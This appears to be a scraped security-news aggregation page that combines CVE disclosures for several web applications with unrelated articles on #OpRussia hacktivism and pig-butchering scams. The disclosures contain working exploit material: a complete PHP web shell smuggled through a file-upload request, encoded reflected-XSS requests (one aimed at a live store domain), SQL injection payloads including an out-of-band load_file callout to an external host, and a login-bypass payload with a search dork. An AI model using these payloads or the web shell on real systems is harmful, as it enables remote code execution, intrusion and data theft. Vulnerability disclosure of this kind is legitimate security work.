An arbitrary file upload vulnerability in the component /fos/admin/ajax.php of Food Ordering System v2.0 allows attackers to execute arbitrary code via a crafted PHP file.

The Food Ordering System v2 suffers from, File Upload and web-shell upload RCE Vulnerabilities. The upload function for the background image hover of this system is not sanitizing correctly. The attacker can upload some RCE malicious code and easily destroy this system. The status of this system is awful!

POST /fos/admin/ajax.php?action=save\_settings HTTP/1.1
Host: pwnedhost.com
Content\-Length: 6157
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content\-Type: multipart/form-data; boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7W
Origin: http://pwnedhost.com
Referer: http://pwnedhost.com/fos/admin/index.php?page=site\_settings
Accept\-Encoding: gzip, deflate
Accept\-Language: en-US,en;q=0.9
Cookie: PHPSESSID\=598nahp235ehmk2broafrh37qq
Connection: close

------WebKitFormBoundaryqYQLHPx3VuntGH7W
Content\-Disposition: form-data; name="name"

Online Food Ordering System V2
------WebKitFormBoundaryqYQLHPx3VuntGH7W
Content\-Disposition: form-data; name="email"

info@sample.com
------WebKitFormBoundaryqYQLHPx3VuntGH7W
Content\-Disposition: form-data; name="contact"

+6948 8542 623
------WebKitFormBoundaryqYQLHPx3VuntGH7W
Content\-Disposition: form-data; name="about"

<p style="text-align: center; background: transparent; position: relative;"><span style="font-size:28px;background: transparent; position: relative;">ABOUT US</span></b></span></p><p style="text-align: center; background: transparent; position: relative;"><span style="background: transparent; position: relative; font-size: 14px;"><span style="font-size:28px;background: transparent; position: relative;"><b style="margin: 0px; padding: 0px; color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&#x2019;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></span></b></span></p><p style="text-align: center; background: transparent; position: relative;"><span style="background: transparent; position: relative; font-size: 14px;"><span style="font-size:28px;background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-weight: 400; text-align: justify;"><br></span></b></span></p><p style="text-align: center; background: transparent; position: relative;"><span style="background: transparent; position: relative; font-size: 14px;"><span style="font-size:28px;background: transparent; position: relative;"><h2 style="font-size:28px;background: transparent; position: relative;">Where does it come from?</h2><p style="text-align: center; margin-bottom: 15px; padding: 0px; color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-weight: 400;">Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p></span></b></span></p>
------WebKitFormBoundaryqYQLHPx3VuntGH7W
Content\-Disposition: form-data; name="img"; filename="pic.php"
Content\-Type: image/jpeg










<!DOCTYPE HTML PUBLIC "\-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html" charset="euc-kr"\>
		<title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>
		<script type="text/javascript"\>
			function FocusIn(obj)
			{
				if(obj.value == obj.defaultValue)
					obj.value = '';
			}
			
			function FocusOut(obj)
			{
				if(obj.value == '')
					obj.value = obj.defaultValue;
			}
		</script>
	</head>
	<body>
		<b>WebShell's Location = http://<?php echo $\_SERVER\['HTTP\_HOST'\]; echo $\_SERVER\['REQUEST\_URI'\] ?></b><br><br>
		
		HTTP\_HOST = <?php echo $\_SERVER\['HTTP\_HOST'\] ?><br>
		REQUEST\_URI = <?php echo $\_SERVER\['REQUEST\_URI'\] ?><br>
		
		<br>
		
		<form name="cmd\_exec" method="post" action="http://<?php echo $\_SERVER\['HTTP\_HOST'\]; echo $\_SERVER\['REQUEST\_URI'\] ?>"\>	
			<input type\="text" name\="cmd" size\="70" maxlength\="500" value\="Input command to execute" onfocus\="FocusIn(document.cmd\_exec.cmd)" onblur\="FocusOut(document.cmd\_exec.cmd)"\>
			<input type\="submit" name\="exec" value\="exec"\>
		</form\>
		<?php
			if(isset($\_POST\['exec'\]))
			{
				exec($\_POST\['cmd'\],$result);

				echo '----------------- < OutPut > -----------------';
				echo '<pre>';
				foreach($result as $print)
				{
					$print = str\_replace('<','&lt;',$print);
					echo $print . '<br>';
				}
				echo '</pre>';
			}
			else echo '<br>';
		?>
		
		<form enctype\="multipart/form-data" name\="file\_upload" method\="post" action\="http://<?php echo $\_SERVER\['HTTP\_HOST'\]; echo $\_SERVER\['REQUEST\_URI'\] ?>"\>
			<input type\="file" name\="file"\>
			<input type\="submit" name\="upload" value\="upload"\><br\>
			<input type\="text" name\="target" size\="100" value\="Location where file will be uploaded (include file name!)" onfocus\="FocusIn(document.file\_upload.target)" onblur\="FocusOut(document.file\_upload.target)"\>
		</form\>
		<?php
			if(isset($\_POST\['upload'\]))
			{
				$check = move\_uploaded\_file($\_FILES\['file'\]\['tmp\_name'\], $\_POST\['target'\]);
				
				if($check == TRUE)
					echo '<pre>The file was uploaded successfully!!</pre>';
				else
					echo '<pre>File Upload was failed...</pre>';
			}
		?>
	</body\>
</html\>

------WebKitFormBoundaryqYQLHPx3VuntGH7W--

CVE-2023-24646: CVE-nu11secur1ty/vendors/oretnom23/2023/Food-Ordering-System-v2.0 at main · nu11secur1ty/CVE-nu11secur1ty

bgERP v22.31 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.

**Description:**

The bgERP system suffers from unsecured login cookies in which cookies are stored as very sensitive login and also login session information! The attacker can trick the already login user and can steal the already generated cookie from the system and can do VERY DANGEROUS things with the already stored sensitive information. This can be very expensive for all companies which are using this system, please be careful! Also, this system has a vulnerable search parameter for XSS-Reflected attacks!

**STATUS: HIGH Vulnerability**

\[+\] Exploit:

    GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 HTTP/1.1
    Host: 192.168.100.77:8080
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.100.77:8080/Portal/Show
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0
    Connection: close
    Content-Length: 0
    

\[+\] Response after logout of the system:

HTTP/1.1 302 Found
Date: Tue, 31 Jan 2023 15:13:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, must-revalidate
Location: /core\_Users/login/?ret\_url=bgerp%2FPortal%2FShow%2FrecentlySearch\_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522\_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1\_48f6f472
Connection: close
Content-Length: 2
Content-Encoding: none
Content-Type: text/html; charset=UTF-8

OK

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

01:30:00

CVE-2023-25241: CVE-nu11secur1ty/vendors/bgERP/2023/bgERP-v22.31-Cookie-Session-vulnerability+XSS-Reflected at main · nu11secur1ty/CVE-nu11secur1ty

Zstore v6.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /index.php.

The value of manual insertion point 1 is copied into the HTML document as plain text between tags. The payload giflcc0yu0 was submitted in the manual insertion point 1. This input was echoed unmodified in the application's response.

    GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2
    Host: store.zippy.com.ua
    Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    

    HTTP/2 200 OK
    Server: nginx
    Date: Sun, 29 Jan 2023 07:27:55 GMT
    Content-Type: text/html; charset=UTF-8
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546
    
    Class \App\Pages\Chatgiflc<a href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif">
     does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>

CVE-2023-24648: CVE-nu11secur1ty/vendors/zippy/zstore-6.6.0 at main · nu11secur1ty/CVE-nu11secur1ty

SLIMS v9.5.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /customs/loan_by_class.php?reportView.

The value of manual insertion point 3 is copied into the HTML document as plain text between tags. The payload udz21<script>alert(1)</script>rk346 was submitted in manual insertion point 3. This input was echoed unmodified in the application's response. The attacker can trick the already logged-in user, to visit the exploit link that this attacker is created, and if this already logged-in user is not actually IT or admin, this will be the end of this system.

    GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27 HTTP/1.1
    Host: pwnedhost1.com
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1; SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4
    Connection: close

CVE-2023-24086: CVE-nu11secur1ty/vendors/slims.web.id/SLIMS-9.5.2 at main · nu11secur1ty/CVE-nu11secur1ty

ChiKoi v1.0 was discovered to contain a SQL injection vulnerability via the load_file function.

**ChiKoi-1.0-SQLi****Vendor**

**Description:**

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load\_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load\_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Payload:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND 9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION SELECT 6994) END))-- -
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578\=4578 AND (SELECT 8224 FROM(SELECT COUNT(\*),CONCAT(0x71706b7171,(SELECT (ELT(8224\=8224,1))),0x716a6a6271,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- VCWR
\--\-

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spent**

01:30:00

**Writing an exploit**

00:05:00

**In real time:**

\[+\] Online:

\--\-
Parameter: User\-Agent (User\-Agent)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause (subquery \- comment)
    Payload: Mozilla/5.0 (X11; U; Linux x86\_64; en\-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu\-edgy)' WHERE 8386=8386 AND 8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION SELECT 6426) END))-- -
\---

CVE-2023-24084: CVE-nu11secur1ty/vendors/tanhongit/2023/ChiKoi at main · nu11secur1ty/CVE-nu11secur1ty

Vsourz Digital Advanced Contact form 7 DB Versions 1.7.2 and 1.9.1 is vulnerable to Cross Site Scripting (XSS).

Permalink

Cannot retrieve contributors at this time

Reflected XSS (Cross-Site Scripting) attack - CVE-2022-45285

\------------------------------------------------------------

Vendor: Vsourz Digital

Wordpress Plugin Versions: Advanced Contact form 7 DB - 1.7.2, 1.9.1

Type: Remote attack

We have identified that the “Advanced Contact form 7 DB - 1.7.2, 1.9.1” Wordpress Plugin Versions are vulnerable to Reflective Cross-site scripting (XSS). This is due to that the Web App fails to sanitize HTML/JavaScript code on the server-side. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser (e.g. admin) within the security context of the affected site. This attack can be used in conjunction with a social engineering techniques.

We have managed to bypass the client-side protection (URL Encoding) by intercepting the GET HTTP request using an HTTP proxy tool, and then inserting the XSS payload. Also, we have bypassed the server-side protection (Backslash Escaping) using backticks instead of single or double quotes.

Below, evidence is provided.

Request:

GET /formsurvey/index.php/user/admin/?'><script>alert(\`XSS\`)</script><' HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK

Date: Fri, 04 Nov 2022 12:56:09 GMT

Server: Apache

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Link: <http://1.1.1.1/formsurvey/index.php/wp-json/>; rel="https://api.w.org/"

Link: <http://1.1.1.1/formsurvey/?p=33>; rel=shortlink

Vary: Accept-Encoding

Content-Length: 31433

Connection: close

Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>

....

....

<link rel='canonical' href='http://1.1.1.1/formsurvey/index.php/user/admin/?\\'><script>alert(\`XSS\`)</script><\\'' />

....

....

</html>

CVE-2022-45285: Vsourz-Digital/AdvancedContactForm_CF7_DB_XSS.txt at main · IthacaLabs/Vsourz-Digital

The cyberwar to attack Russia has never really stopped, despite a decreasing interest from the West.

Almost a year ago, Russia invaded Ukraine.

Due to the unprovoked aggression by Russia, worldwide condemnation was quickly followed by a call to arms to help Ukraine, both on the ground and in cyberspace. #OpRussia was born.

A year on, you'd be forgiven for thinking that #OpRussia had died down. What happened to it? What did it achieve?

First, let's look at the numbers and the participants. While it's hard to pin down exactly how many people are active in the cyberwarfare aspect of the conflict, estimates range from 150,000 to 400,000, based on the number of subscribers to various Telegram channels. Count active subscribers to the various Discord channels and active reactions to such posts, however, and you get closer to 200,000 — many of which are found in the IT army Telegram channel, the main repository for target listing and action in the ongoing cyberwarfare.

To confuse matters, there are also participants in various auxiliary organizations that have flocked to the Ukrainian banner. Hacken.io — a bug bounty outfit based out of Kyiv that specializes in security of crypto tokens, extended the call to arms to its own army of hackers. While the initial callout was to find vulnerabilities in Russian infrastructure, this was walked back a few weeks later to protect Ukrainian infrastructure. Then we have Anonymous (the infamous, nebulous organization that anyone can identify with), which pushed the #OpRussia tag to prioritize attacks against Russian interests in cyberspace. On top of this, disparate hackers and entities joined the fray. For example, Network Battalion 65, a pro-Ukrainian outfit, appeared on Twitter in February 2022 and almost immediately started compromising high-profile Russian targets with alarming regularity, under the #OpRussia banner.

**The Tools and Initiatives**

A lot of high-profile initiatives were born from the drive to damage Russian interests (and, eventually, Western entities that still maintained a presence in Russia). The most popular and still actively used is Disbalancer (also called "Liberator"), a DDoS tool used to take down infrastructure targets. The barrier to entry for this tool is extremely low: simply download the flavor of your choice — Windows, Mac, or Linux — and run it, and your bandwidth is used to attack a rotating target list.

Disbalancer has had remarkable success, with an average running load of 3,000 users (still a formidable botnet), with peaks of more than 34,000 users. The tool has had more than 200,000 downloads to date. There is a rotating target list of up to a dozen targets, and Disbalancer claims to have attacked more than 700 Russian targets.

On top of this were some more esoteric efforts, such as PlayforUkraine.life, a simple Web-based game of 2048, which performed application-level DDoS in the background. This was responsible for taking down Alfabank, Russia's largest domestic bank. PlayforUkraine.life isn't active anymore and seems to have gone quiet in mid-July or August of last year.

Another such site is WasteRussianTime.today, which automatically connected two government officials with each other. As the name implies, the only outcome was wasted time and some hilarious results. The website is currently showing a 502 error and looks like it went out of action in about June or July of last year.

**The Impact and Breaches**

The one notable constant in the cyber conflict is how the Russian mythos of invulnerability has quickly evaporated (a parallel can be drawn here to its "physical" forces too). The breaches from February to August would be too numerous to list here, but for brevity I've listed the biggest ones. (For similar reasons I've also omitted DDoS takedowns, as these are now in the hundreds of targets.)

At the top of the list we have Roskomnadzor, at a whopping 900GB. It effectively is the mass surveillance department for the Russian population. This was quickly followed up byVGTRK — the Russian state broadcaster, essentially a propaganda mouthpiece for the Kremlin — that was 20 years' worth of emails and 700GB of data. Then lots of other government affiliated entities follow: Rosatom (state nuclear agency), the Central Bank of Russia, Gazprom, Petrofort, the Russian interior ministry, Transneft, SberBank, the Federal Security Service, and even the Russian Orthodox Church all get their turn. For the first six months of 2022, the Russian government was suffering a breach every three days, for a total equivalent of 20TB (!) of breached data in the first few months of the war.

This is only counting the leaks made public via various entities such as Ddossecrets.com, where most of these leaks can be found.

But then, after the first six months, things got a bit quiet. Even the most prolific actor on the scene, Network Battalion 65 — which was tearing through Russian companies since February — went dark in August 2022 and never resurfaced. In its wake, more than 20 high-profile breaches and something north of 4TB of data leaked by them alone in the space of four months.

**So, What's Happening Now, and Why Have Things Subsided?**

The cyberwar never really stopped, and the attacks rumble on at a lower rhythm, but the intensity remains. At the time of this writing, for example, atol.ru (tech company supporting automation) and ofd.ru (a cloud company) are the current targets of the IT army of Ukraine, and that's not mentioning the dozen or so rotating targets of the Disbalancer tool.

Interest in Ukraine has sadly waned in the Western press as the conflict rumbles on. Google Trends shows that, aside form a large peak in February/March 2022 and a follow-up jump in May, interest in Ukraine in search terms has slowly decreased. The impact on the overall course of the war, however, remains unclear, and if anything proves that true cyberwar is a long way off and that the real outcome of the war will be decided in real space with guns and steel.

What Happened to #OpRussia?

Global Infotech CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Global Infotech cms v 1.0 Auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.globalinfotech.co                                                                                       |  | # Dork      : "intext:"Powered by : Global Infotech"                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload = user & pass : 1'or'1'='1[+] http://127.0.0.1/aaravcscdurgcom/admin/Dashboard.aspxGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Global Infotech CMS 1.0 SQL Injection

Investment schemes are ensnaring victims with increasingly compelling narratives and believable tech.

Gallagher found that the website the scammers were using to distribute their malicious apps was set up to impersonate a real Japanese financial company and had a .com domain. It was even visible on Google as one of the top results, Gallagher says, so victims could find it if they attempted to do some basic research. “To someone who isn't particularly knowledgeable about these things, that part would be pretty convincing,” Gallagher says.

The attackers, who Sophos suspects are based in Hong Kong, developed Windows, Android, and iOS apps off of a legitimate trading service from a Russian software company. Known as MetaTrader 4, Sophos researchers have seen past examples of the platform being misused and abused for fraud. As part of joining the platform, victims had to disclose personal details including tax identification numbers and photos of government identification documents, then start moving cash into their account.

As is often the case in a wide range of scams, the attackers were distributing their iOS app using a compromised certificate for Apple's enterprise device management program. Sophos researchers have recently found pig butchering-related apps that skirted Apple's defenses to sneak into the company's official App Store, though.

The second scam Gallagher followed appears to have been run by a Chinese crime syndicate out of Cambodia. The tech for the scheme was less sleek and impressive but still expansive. The group ran a fake Android and iOS cryptocurrency trading app that impersonated the legitimate market tracking service TradingView. But the scheme had a much more developed and sophisticated social engineering arm to lure victims in and make them feel like they had a real relationship with the scammer suggesting that they invest money. 

“It starts off, ‘Hey Jane are you still in Boston?' so I messaged back, ‘Sorry, wrong number,’ and we had a standard exchange from there,” Gallagher says. The conversation started on SMS and then moved to Telegram.

The persona claimed to be a Malaysian woman living in Vancouver, British Columbia. She said that she ran a wine business and sent a photo of herself standing next to a bar, though the bar was mostly stocked with liquor, not wine. Gallagher was eventually able to identify the bar in the photo as one in the Rosewood Hotel in the Cambodian capital, Phnom Penh.

When asked, Gallagher once again said that he was a cybersecurity threat researcher, but the scammer was not deterred. He added that his company had an office in Vancouver and repeatedly tried to suggest meeting in person. The scammers were committed to the ruse, though, and Gallagher received a few audio and video messages from the woman in the photo. Eventually he even video chatted with her.

“Her English skills were pretty good, she was in a very nondescript location, it looked like a room with acoustic wall pads, kind of like an office or conference room,” Gallagher says. “She told me she was at home, and our conversation quickly steered toward whether I was going to be doing the high-frequency crypto trading with them.”

Cryptocurrency wallets associated with the scam took in roughly $500,000 in a single month from victims, according to Sophos’ monitoring. 

The researchers reported their findings on both scams to the relevant cryptocurrency platforms, tech companies, and global cybersecurity response teams, but both operations are still active and were able to continually establish new infrastructure when their apps or wallets got taken down.

Sophos is redacting all images of people from both scams in its reports, because pig butchering attacks are often staffed using forced labor, and participants may be working against their will. Gallagher says that the most sinister thing about the attacks is how their evolution and growth means more forced labor on top of more devastated and financially ruined victims. As law enforcement agencies around the world scramble to counter the threat, though, in-depth details of the mechanics of the schemes show how they work and how slippery and adaptive they can be.

Pig Butchering Scams Are Evolving Fast

Local privilege escalation due to incomplete uninstallation cleanup. The following products are affected: Acronis Cyber Protect Home Office (Windows) before build 40107, Acronis Agent (Windows) before build 30025, Acronis Cyber Protect 15 (Windows) before build 30984.

Tag

#windows